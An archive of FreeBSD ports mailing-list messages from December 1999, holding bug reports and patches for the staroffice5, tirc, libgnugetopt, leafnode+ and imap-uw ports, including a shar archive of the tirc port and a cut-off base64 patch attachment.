(MET) Received: from mars.cert.siemens.de (ust.mchp.siemens.de [139.23.201.17]) by mail1.siemens.de (8.9.3/8.9.3) with ESMTP id VAA21197 for ; Tue, 21 Dec 1999 21:09:36 +0100 (MET) Received: from alaska.cert.siemens.de (alaska.cert.siemens.de [139.23.202.134]) by mars.cert.siemens.de (8.9.3/8.9.3/Siemens CERT [ $Revision: 1.9 ]) with ESMTP id VAA00897 for ; Tue, 21 Dec 1999 21:09:36 +0100 (CET) Received: (from ust@localhost) by alaska.cert.siemens.de (8.9.3/8.9.3/alaska [ $Revision: 1.2 ]) id UAA01728 for FreeBSD-gnats-submit@freebsd.org; Tue, 21 Dec 1999 20:09:36 GMT (envelope-from ust) Message-Id: <19991221210936.A1656@alaska.cert.siemens.de> Date: Tue, 21 Dec 1999 21:09:36 +0100 From: Udo Schweigert To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15623: Trying again Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15623 >Category: ports >Synopsis: Build fails in ports/editors/staroffice5 with USE_CDROM >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 00:30:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Udo Schweigert >Release: FreeBSD 3.4-STABLE i386 >Organization: Siemens AG, ZT IK 3 >Environment: FreeBSD 3.4-STABLE i386 >Description: When doing make USE_CDROM=yes in /usr/ports/editors/staroffice5 I get ===> staroffice-5.1a depends on executable: unzip - found ln: illegal option -- v usage: ln [-fs] file1 file2 ln [-fs] file ... directory >How-To-Repeat: As described. >Fix: Apply this patch: --- Makefile.orig Wed Dec 15 00:14:28 1999 +++ Makefile Tue Dec 21 14:47:13 1999 @@ -47,7 +47,7 @@ .if defined(USE_CDROM) do-extract: @${MKDIR} ${WRKSRC}/office51 - @cd ${WRKSRC}/office51 && ${LN} -s -v /cdrom/linux/office51/* . + @cd ${WRKSRC}/office51 && ${LN} -s /cdrom/linux/office51/* . .endif post-extract: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 1:50:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D3EE014E34 for ; Wed, 22 Dec 1999 01:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA18506; Wed, 22 Dec 1999 01:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mail2.netcologne.de (mail2.netcologne.de [194.8.194.103]) by hub.freebsd.org (Postfix) with ESMTP id 8185414E34 for ; Wed, 22 Dec 1999 01:42:53 -0800 (PST) (envelope-from dr@domix.de) Received: from lamest.domix.de (dial-ra-nc4-140.netcologne.de [195.14.254.140]) by mail2.netcologne.de (8.9.3/8.9.3) with ESMTP id KAA22234 for ; Wed, 22 Dec 1999 10:42:50 +0100 (MET) Received: from domix.de (speed.localnet.lan [192.168.1.2]) by lamest.domix.de (8.9.3/8.9.3) with ESMTP id KAA04041 for ; Wed, 22 Dec 1999 10:39:32 +0100 (CET) (envelope-from dr@domix.de) Received: (from dr@localhost) by domix.de (8.9.3/8.9.3) id KAA01701; Wed, 22 Dec 1999 10:41:35 +0100 (CET) (envelope-from dr) Message-Id: <199912220941.KAA01701@domix.de> Date: Wed, 22 Dec 1999 10:41:35 +0100 (CET) From: Dominik Rothert Reply-To: Dominik Rothert To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15624: tirc-1.2.tar.gz MD5sum invalid Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15624 >Category: ports >Synopsis: tirc-1.2.tar.gz MD5sum invalid >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 01:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dominik Rothert >Release: FreeBSD 4.0-CURRENT i386 >Organization: Am I organized? >Environment: 4.0-CURRENT, ports updated 10 minutes ago. >Description: /usr/ports/irc/tirc/files/md5: MD5 (tirc-1.2.tar.gz) = d5e77df1f4e16c67cee602bc65dea6c6 is invalid since there were some changes in the sources, and the new checksum of is MD5 (tirc-1.2.tar.gz) = 0f4b3e6e67830c3a0682c1d17893b5d2 >How-To-Repeat: cd /usr/ports/irc/tirc ; make # only if $MASTER_SITE_OVERRIDE isn't set >Fix: here's a patch: --- tirc.shar.orig Wed Dec 22 10:27:56 1999 +++ tirc.shar Wed Dec 22 10:23:47 1999 @@ -26,7 +26,7 @@ mkdir -p tirc/files > /dev/null 2>&1 echo x - tirc/files/md5 sed 's/^X//' >tirc/files/md5 << 'END-of-tirc/files/md5' -XMD5 (tirc-1.2.tar.gz) = d5e77df1f4e16c67cee602bc65dea6c6 +XMD5 (tirc-1.2.tar.gz) = 0f4b3e6e67830c3a0682c1d17893b5d2 END-of-tirc/files/md5 echo c - tirc/pkg mkdir -p tirc/pkg > /dev/null 2>&1 the complete shar: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # tirc/ # tirc/files # tirc/files/md5 # tirc/pkg # tirc/pkg/COMMENT # tirc/pkg/DESCR # tirc/pkg/PLIST # tirc/patches # tirc/patches/patch-ad # tirc/patches/patch-aa # tirc/patches/patch-ab # tirc/patches/patch-ac # tirc/patches/patch-ae # tirc/Makefile # echo c - tirc/ mkdir -p tirc/ > /dev/null 2>&1 echo c - tirc/files mkdir -p tirc/files > /dev/null 2>&1 echo x - tirc/files/md5 sed 's/^X//' >tirc/files/md5 << 'END-of-tirc/files/md5' XMD5 (tirc-1.2.tar.gz) = 0f4b3e6e67830c3a0682c1d17893b5d2 END-of-tirc/files/md5 echo c - tirc/pkg mkdir -p tirc/pkg > /dev/null 2>&1 echo x - tirc/pkg/COMMENT sed 's/^X//' >tirc/pkg/COMMENT << 'END-of-tirc/pkg/COMMENT' XToken's 'Internet Relay Chat' Client END-of-tirc/pkg/COMMENT echo x - tirc/pkg/DESCR sed 's/^X//' >tirc/pkg/DESCR << 'END-of-tirc/pkg/DESCR' Xtirc is another IRC client. It has support for vi-like editor line and Xgeneral usage, nickname completion, ANSI-colors, flood protection and Xmany more. END-of-tirc/pkg/DESCR echo x - tirc/pkg/PLIST sed 's/^X//' >tirc/pkg/PLIST << 'END-of-tirc/pkg/PLIST' Xbin/tirc Xshare/tirc/tircrc END-of-tirc/pkg/PLIST echo c - tirc/patches mkdir -p tirc/patches > /dev/null 2>&1 echo x - tirc/patches/patch-ad sed 's/^X//' >tirc/patches/patch-ad << 'END-of-tirc/patches/patch-ad' X--- cmd.c.orig Sat Feb 20 17:52:12 1999 X+++ cmd.c Mon Aug 23 18:49:49 1999 X@@ -213,6 +213,7 @@ X { "URL", 0, urlcmd, 0, urlhelp }, X { "UPTIME", 0, uptimecmd, 0, uptimehelp }, X { "COLOUR", 0, colourcmd, 0, colourhelp }, X+{ "COLOR", 0, colourcmd, 0, colourhelp }, X { "SOURCE", 0, sourcecmd, 0, sourcehelp }, X { "NCOL", 0, ncolcmd, 0, ncolhelp }, X #ifdef WITH_DLMOD X@@ -1112,7 +1113,7 @@ X } X } X X- if (!strcmp("COLOUR", option) || all) { X+ if (!strcmp("COLOUR", option) || !strcmp("COLOR", option) || all) { X if (args != NULL) { X irc_strupr(args); X if (!strcmp("ON", args)) END-of-tirc/patches/patch-ad echo x - tirc/patches/patch-aa sed 's/^X//' >tirc/patches/patch-aa << 'END-of-tirc/patches/patch-aa' X--- main.c.orig Sun Aug 22 14:44:04 1999 X+++ main.c Sun Aug 22 14:44:26 1999 X@@ -278,7 +278,7 @@ X fprintf(stderr, "DEBUG: visual debug output active.\n"); X #endif X /* Parse the startup file(s) */ X- readrc("/usr/local/share/tircrc"); X+ readrc("__PREFIX__/share/tirc/tircrc"); X X if ((home = getenv("HOME")) == NULL) X return 1; END-of-tirc/patches/patch-aa echo x - tirc/patches/patch-ab sed 's/^X//' >tirc/patches/patch-ab << 'END-of-tirc/patches/patch-ab' X--- tirc.1.orig Sun Aug 22 14:56:21 1999 X+++ tirc.1 Sun Aug 22 14:56:40 1999 X@@ -618,7 +618,7 @@ X .br X .SH FILES X .TP X-.I /usr/local/share/tircrc X+.I __PREFIX__/share/tirc/tircrc X Global startup file. X .TP X .I $HOME/.tircrc END-of-tirc/patches/patch-ab echo x - tirc/patches/patch-ac sed 's/^X//' >tirc/patches/patch-ac << 'END-of-tirc/patches/patch-ac' X--- configure.orig Sun Aug 22 14:55:40 1999 X+++ configure Sun Aug 22 14:55:55 1999 X@@ -754,7 +754,7 @@ X bsdi*) CC=${CC-"shlicc"} X OPTFLAG=${OPTFLAG-"-O2"} X LINTFLAGS=${LINTFLAGS-"-g -s"} ;; X-freebsd*) OPTFLAG=${OPTFLAG-"-O2"} X+freebsd*) OPTFLAG=${OPTFLAG-"${CFLAGS}"} X LINTFLAGS=${LINTFLAGS-"-g -s"} X CXFLAGS=${CXFLAGS-"-xref all -html"} ;; X netbsd*) OPTFLAG=${OPTFLAG-"-O2"} END-of-tirc/patches/patch-ac echo x - tirc/patches/patch-ae sed 's/^X//' >tirc/patches/patch-ae << 'END-of-tirc/patches/patch-ae' X--- odlg.c.orig Mon Aug 23 18:43:40 1999 X+++ odlg.c Mon Aug 23 18:47:49 1999 X@@ -49,9 +49,11 @@ X { "OOD", "Enable the Op-On-Demand facility", CONF_OOD, 0 }, X { "ATTRIBS", "ircII-style inline text attributes", CONF_ATTRIBS, 0 }, X { "COLOUR", "ANSI char cell colourization", CONF_COLOUR, 0 }, X+ { "COLOR", "ANSI char cell colourization", CONF_COLOUR, 0 }, X { "STIPPLE", "Dash-on-off line in status lines", CONF_STIPPLE, 0 }, X { "HIDEMCOL", "Filter out mIRC colour crap", CONF_HIDEMCOL, 0 }, X { "NCOLOUR", "Nickname colourization", CONF_NCOLOUR, 0 }, X+ { "NCOLOR", "Nickname colourization", CONF_NCOLOUR, 0 }, X { "NUMERICS", "Display IRC protocol numerics", CONF_NUMERICS, 0 }, X { "TELEVIDEO", "Disable attribs on my old tvi9050", CONF_TELEVIDEO, 0 }, X { "", "", 0, 0 } /* delimiter */ END-of-tirc/patches/patch-ae echo x - tirc/Makefile sed 's/^X//' >tirc/Makefile << 'END-of-tirc/Makefile' X# New ports collection makefile for: tirc IRC-Client X# Version required: 1.2 X# Date created: 14 August 1999 X# Whom: Dominik Rothert X# X# $FreeBSD: ports/irc/tirc/Makefile,v 1.4 1999/10/08 22:46:54 dan Exp $ X# X XDISTNAME= tirc-1.2 XCATEGORIES= irc XMASTER_SITES= ftp://ftp.mayn.de/pub/unix/software/Network/Irc/tirc/ X XMAINTAINER= dr@domix.de X XGNU_CONFIGURE= yes XCONFIGURE_ARGS= "--with-ansi-colours" XMAKE_FLAGS= CONF_ARGS="--prefix=${PREFIX}" XMAN1= tirc.1 X Xpost-patch: X @${PERL} -pi -e 's:__PREFIX__:${PREFIX}:g' ${WRKSRC}/*.c X @${PERL} -pi -e 's:__PREFIX__:${PREFIX}:g' ${WRKSRC}/*.1 X Xpost-install: X strip ${PREFIX}/bin/tirc X ${MKDIR} ${PREFIX}/share/tirc X ${INSTALL_DATA} ${WRKDIR}/${DISTNAME}/dot.tircrc ${PREFIX}/share/tirc/tircrc X X.include END-of-tirc/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 1:51:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 69B7615491; Wed, 22 Dec 1999 01:51:52 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.11 #1) id 120iR5-0006HT-00; Wed, 22 Dec 1999 11:51:59 +0200 From: Sheldon Hearn To: FreeBSD mailing list Cc: thepish@freebsd.org, freebsd-ports@FreeBSD.ORG Subject: Re: ports/14833: update port: sfio In-reply-to: Your message of "Wed, 22 Dec 1999 08:49:57 +0100." Date: Wed, 22 Dec 1999 11:51:59 +0200 Message-ID: <24146.945856319@axl.noc.iafrica.com> Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 22 Dec 1999 08:49:57 +0100, FreeBSD mailing list wrote: > I am talking of AFS arla port... it does not work on FreeBSD, very > bad... because since I need AFS I was forced to use OpenBSD and > repleace FreeBSD Have you tried installing the package? What exactly doesn't work (error messages?) and what did you tell thepish@freebsd.org, who is the maintainer of the port? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 2:10: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0C1631512C for ; Wed, 22 Dec 1999 02:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA20210; Wed, 22 Dec 1999 02:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from icc.surw.chel.su (surw.chel.su [195.54.2.162]) by hub.freebsd.org (Postfix) with ESMTP id 3766515022 for ; Wed, 22 Dec 1999 02:07:59 -0800 (PST) (envelope-from andy@icc.surw.chel.su) Received: (from andy@localhost) by icc.surw.chel.su (8.9.3/8.9.3) id NAA28362; Wed, 22 Dec 1999 13:07:55 +0300 (MSK) (envelope-from andy) Message-Id: <199912221007.NAA28362@icc.surw.chel.su> Date: Wed, 22 Dec 1999 13:07:55 +0300 (MSK) From: Andrey Zakhvatov Reply-To: andy@icc.surw.chel.su To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15625: Update port: devel/libgnugetopt Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15625 >Category: ports >Synopsis: Update port: devel/libgnugetopt >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 02:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andrey Zakhvatov >Release: FreeBSD 3.3-RELEASE i386 >Organization: South Ural Railway ICC >Environment: >Description: This is a patch to update devel/libgnugetopt port. diff -Nru libgnugetopt/Makefile libgnugetopt-1.1/Makefile --- libgnugetopt/Makefile Wed Aug 25 14:14:00 1999 +++ libgnugetopt-1.1/Makefile Wed Dec 22 13:03:09 1999 @@ -8,7 +8,7 @@ DISTNAME= libgnugetopt-1.1 CATEGORIES= devel -MASTER_SITES= http://www.geocities.com/SiliconValley/Code/3502/ +MASTER_SITES= http://members.tripod.com/zakhvatov/ MAINTAINER= andy@icc.surw.chel.su >How-To-Repeat: >Fix: Please, check and apply this patch. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 2:30:58 1999 Delivered-To: freebsd-ports@freebsd.org Received: from m0.cs.berkeley.edu (m0.CS.Berkeley.EDU [128.32.45.176]) by hub.freebsd.org (Postfix) with ESMTP id 110C71506D for ; Wed, 22 Dec 1999 02:30:57 -0800 (PST) (envelope-from asami@cs.berkeley.edu) Received: from silvia.hip.berkeley.edu (sji-ca5-14.ix.netcom.com [209.109.234.14]) by m0.cs.berkeley.edu (8.9.3/8.9.3) with ESMTP id CAA02639 for ; Wed, 22 Dec 1999 02:30:43 -0800 (PST) (envelope-from asami@cs.berkeley.edu) Received: (from asami@localhost) by silvia.hip.berkeley.edu (8.9.3/8.6.9) id CAA13640; Wed, 22 Dec 1999 02:28:42 -0800 (PST) Date: Wed, 22 Dec 1999 02:28:42 -0800 (PST) Message-Id: <199912221028.CAA13640@silvia.hip.berkeley.edu> X-Authentication-Warning: silvia.hip.berkeley.edu: asami set sender to asami@cs.berkeley.edu using -f To: ports@FreeBSD.org Subject: ports freeze over From: asami@cs.berkeley.edu (Satoshi Asami) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As I said below, thanks guys! -PW ------- From: Satoshi Asami Subject: cvs commit: CVSROOT avail To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Date: Wed, 22 Dec 1999 02:19:58 -0800 (PST) asami 1999/12/22 02:19:58 PST Modified files: . avail Log: The ports freeze is over now. I can't remember a release that went so smooth (from the Ports Collection's point of view). Thanks for the help, guys! Revision Changes Path 1.111 +2 -2 CVSROOT/avail To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 3:10:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A1DB71504D for ; Wed, 22 Dec 1999 03:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA25017; Wed, 22 Dec 1999 03:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from king.naoe.t.u-tokyo.ac.jp (king.naoe.t.u-tokyo.ac.jp [133.11.65.63]) by hub.freebsd.org (Postfix) with ESMTP id B767B14DAA for ; Wed, 22 Dec 1999 03:03:49 -0800 (PST) (envelope-from t80382@naoe.t.u-tokyo.ac.jp) Received: from localhost (localhost [127.0.0.1]) by king.naoe.t.u-tokyo.ac.jp (8.9.3/3.7W/hiroko-rubens-2.2) with ESMTP id UAA12559 for ; Wed, 22 Dec 1999 20:06:05 +0900 (JST) Message-Id: <19991222200605L.t80382@naoe.t.u-tokyo.ac.jp> Date: Wed, 22 Dec 1999 20:06:05 +0900 From: "Mas.TAKEMURA" To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15626: ports leafnode+ Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15626 >Category: ports >Synopsis: error description in MESSAGE >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 03:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Masahiro TAKEMURA >Release: FreeBSD 3.3-RELEASE i386 >Organization: University of Tokyo, Japan. >Environment: >Description: error in printing version number >How-To-Repeat: >Fix: diff -ur leafnode+.orig/pkg/MESSAGE leafnode+/pkg/MESSAGE --- leafnode+.orig/pkg/MESSAGE Wed Dec 22 19:17:18 1999 +++ leafnode+/pkg/MESSAGE Wed Dec 22 19:19:28 1999 @@ -1,7 +1,7 @@ WARNING: Although leafnode+ has been installed, a spool area for storing news articles is not present on your computer. To create a spool area in /var/spool/news, type: -% cd work/leafnode+-2.6 +% cd work/leafnode+-2.8 % make installall Alternatively, make sure the LEAFNODE_SETUP_WRKDIRS variable is defined at install time. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 3:12:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ady.warpnet.ro (ady.warpnet.ro [194.102.224.1]) by hub.freebsd.org (Postfix) with ESMTP id B9DC714E37; Wed, 22 Dec 1999 03:12:15 -0800 (PST) (envelope-from ady@ady.ro) Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id NAA94601; Wed, 22 Dec 1999 13:13:59 +0200 (EET) (envelope-from ady@ady.ro) Date: Wed, 22 Dec 1999 13:13:59 +0200 (EET) From: Adrian Penisoara X-Sender: ady@ady.warpnet.ro To: Akinori MUSHA aka knu Cc: freebsd-gnats-submit@FreeBSD.org, freebsd-ports@FreeBSD.org, sprice@hiwaay.net Subject: Re: ports/14359: Update port: mail/imap-uw In-Reply-To: <86so1aeib0.wl@localhost.local.idaemons.org> Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="0-888792416-945861049=:94176" Content-ID: Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-888792416-945861049=:94176 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Hi, Finally, I have build up a patchset to upgrade from the current 4.5 sources to version 4.7. The port uses the imap-4.7.lock-patch and mlock from imap-utils package. The building of PAM authentication support is optional and disabled by default, it can be activated either by definig the variable PAMAUTH as "yes" or by changing the default "no" value in the makefile. I'd like to ask Akinori (and whoever else wants) to test the submitted patches; please send your comments to imap-uw@freebsd.ady.ro. For the sake of simplicity I'll post the archived port on the appropiate lists soon... Some notes for the committer: * New files: patches/patch-ad patches/patch-ae pkg/MESSAGE * Modified files: all files except patches/patch-aa patches/patch-ac and pkg/COMMENT * the port has been portlinted (-cav) with only 2 warnings as output * as I haven't been able to properly test the port (only with mboxtest) and because I have introduced the usage of a mail SGID mlock executable (used for locking in the /var/mail/ mail spool) which hasn't been "screened" for eventual security compromises, I'd like to ask the committer to delay the commit for a few days to let the testers submit their feedback... Notice: some portions of the patches are taken from Akinori Musha's submitted patches so proper credit goes to him. PS: Akinori, I'm open to your suggestions to extend the port with imap-utils widgets... Thanks a lot ! Ady (@freebsd.ady.ro) --0-888792416-945861049=:94176 Content-Type: APPLICATION/OCTET-STREAM; NAME="imap-uw-4.7.diff.gz" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: imap-uw 4.5 to 4.7 archived patchfile Content-Disposition: ATTACHMENT; FILENAME="imap-uw-4.7.diff.gz" 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 